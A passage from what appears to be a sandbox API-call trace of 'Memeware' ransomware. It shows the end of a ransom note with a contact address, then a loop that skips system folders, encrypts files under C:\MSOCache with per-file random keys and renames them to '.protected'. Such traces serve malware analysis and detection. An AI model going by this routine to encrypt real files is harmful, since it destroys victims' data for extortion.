(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0058.929] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0058.929] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0058.929] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0058.929] CloseHandle (hObject=0xb4) returned 1 [0058.930] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="Windows") returned -1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files") returned -1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="Program Files (x86)") returned -1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="$Recycle.bin") returned 1 [0058.930] lstrcmpiW (lpString1="branding.xml", lpString2="System Volume Information") returned -1 [0058.930] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.930] StrStrIW (lpFirst="branding.xml", lpSrch=".protected") returned 0x0 [0058.930] lstrcmpW (lpString1="branding.xml", lpString2="RESTORE_FILES.txt") returned -1 [0058.930] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.930] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.930] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.933] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.933] StrStrW (lpFirst="branding.xml", lpSrch=".txt") returned 0x0 [0058.933] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.933] StrStrW (lpFirst="branding.xml", lpSrch=".rar") returned 0x0 [0058.933] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml") returned 79 [0058.933] StrStrW (lpFirst="branding.xml", lpSrch=".zip") returned 0x0 [0058.933] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.944] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.944] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.947] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.947] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.955] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.956] CloseHandle (hObject=0xb4) returned 1 [0058.956] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.protected") returned 89 [0058.956] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\branding.xml.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\branding.xml.protected")) returned 1 [0058.956] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="Windows") returned -1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="Program Files") returned -1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="Program Files (x86)") returned -1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="$Recycle.bin") returned 1 [0058.956] lstrcmpiW (lpString1="DW20.EXE", lpString2="System Volume Information") returned -1 [0058.956] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.956] StrStrIW (lpFirst="DW20.EXE", lpSrch=".protected") returned 0x0 [0058.956] lstrcmpW (lpString1="DW20.EXE", lpString2="RESTORE_FILES.txt") returned -1 [0058.956] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.957] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.957] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.957] StrStrW (lpFirst="DW20.EXE", lpSrch=".txt") returned 0x0 [0058.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.957] StrStrW (lpFirst="DW20.EXE", lpSrch=".rar") returned 0x0 [0058.957] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE") returned 75 [0058.957] StrStrW (lpFirst="DW20.EXE", lpSrch=".zip") returned 0x0 [0058.957] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.968] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.968] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.969] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.969] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.974] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.974] CloseHandle (hObject=0xb4) returned 1 [0058.974] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.protected") returned 85 [0058.974] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\DW20.EXE.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dw20.exe.protected")) returned 1 [0058.975] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Windows") returned -1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Program Files") returned -1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="Program Files (x86)") returned -1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="$Recycle.bin") returned 1 [0058.975] lstrcmpiW (lpString1="dwdcw20.dll", lpString2="System Volume Information") returned -1 [0058.975] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrIW (lpFirst="dwdcw20.dll", lpSrch=".protected") returned 0x0 [0058.975] lstrcmpW (lpString1="dwdcw20.dll", lpString2="RESTORE_FILES.txt") returned -1 [0058.975] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.975] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.975] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".txt") returned 0x0 [0058.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".rar") returned 0x0 [0058.975] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll") returned 78 [0058.975] StrStrW (lpFirst="dwdcw20.dll", lpSrch=".zip") returned 0x0 [0058.975] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.977] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.977] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.977] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.977] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.978] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.978] CloseHandle (hObject=0xb4) returned 1 [0058.979] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.protected") returned 88 [0058.979] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwdcw20.dll.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwdcw20.dll.protected")) returned 1 [0058.979] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Windows") returned -1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Program Files") returned -1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="Program Files (x86)") returned -1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="$Recycle.bin") returned 1 [0058.979] lstrcmpiW (lpString1="dwtrig20.exe", lpString2="System Volume Information") returned -1 [0058.979] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.979] StrStrIW (lpFirst="dwtrig20.exe", lpSrch=".protected") returned 0x0 [0058.979] lstrcmpW (lpString1="dwtrig20.exe", lpString2="RESTORE_FILES.txt") returned -1 [0058.979] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.979] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.979] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.980] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.980] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".txt") returned 0x0 [0058.980] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.980] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".rar") returned 0x0 [0058.980] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe") returned 79 [0058.980] StrStrW (lpFirst="dwtrig20.exe", lpSrch=".zip") returned 0x0 [0058.980] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.984] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0058.984] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0058.985] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0058.985] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0058.994] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0058.994] CloseHandle (hObject=0xb4) returned 1 [0058.995] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.protected") returned 89 [0058.995] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\dwtrig20.exe.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\dwtrig20.exe.protected")) returned 1 [0058.995] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Windows") returned -1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Program Files") returned -1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="Program Files (x86)") returned -1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="$Recycle.bin") returned 1 [0058.995] lstrcmpiW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="System Volume Information") returned -1 [0058.995] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.995] StrStrIW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".protected") returned 0x0 [0058.995] lstrcmpW (lpString1="Microsoft.VC90.CRT.manifest", lpString2="RESTORE_FILES.txt") returned -1 [0058.995] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0058.996] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0058.996] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0058.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.997] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".txt") returned 0x0 [0058.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.997] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".rar") returned 0x0 [0058.997] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest") returned 94 [0058.997] StrStrW (lpFirst="Microsoft.VC90.CRT.manifest", lpSrch=".zip") returned 0x0 [0058.997] ReadFile (in: hFile=0xb4, lpBuffer=0x495c48, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesRead=0x295f174*=0x741, lpOverlapped=0x0) returned 1 [0059.004] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffff8bf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0059.004] WriteFile (in: hFile=0xb4, lpBuffer=0x495c48*, nNumberOfBytesToWrite=0x741, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x495c48*, lpNumberOfBytesWritten=0x295f174*=0x741, lpOverlapped=0x0) returned 1 [0059.004] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.004] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0059.004] WriteFile (in: hFile=0xb4, lpBuffer=0x47b7a8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x47b7a8*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0059.005] CloseHandle (hObject=0xb4) returned 1 [0059.005] wnsprintfW (in: pszDest=0x495c48, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.protected") returned 104 [0059.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Microsoft.VC90.CRT.manifest.protected" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\microsoft.vc90.crt.manifest.protected")) returned 1 [0059.005] FindNextFileW (in: hFindFile=0x447cc0, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0059.005] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Windows") returned -1 [0059.005] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Program Files") returned -1 [0059.005] lstrcmpiW (lpString1="msvcr90.dll", lpString2="Program Files (x86)") returned -1 [0059.006] lstrcmpiW (lpString1="msvcr90.dll", lpString2="$Recycle.bin") returned 1 [0059.006] lstrcmpiW (lpString1="msvcr90.dll", lpString2="System Volume Information") returned -1 [0059.006] wnsprintfW (in: pszDest=0x47c9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrIW (lpFirst="msvcr90.dll", lpSrch=".protected") returned 0x0 [0059.006] lstrcmpW (lpString1="msvcr90.dll", lpString2="RESTORE_FILES.txt") returned -1 [0059.006] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0059.006] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x47b7a8*, pdwDataLen=0x295f154*=0x30) returned 1 [0059.006] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0059.006] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrW (lpFirst="msvcr90.dll", lpSrch=".txt") returned 0x0 [0059.006] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 78 [0059.006] StrStrW (lpFirst="msvcr90.dll", lpSrch=".rar") returned 0x0 [0059.006] lstrlenW 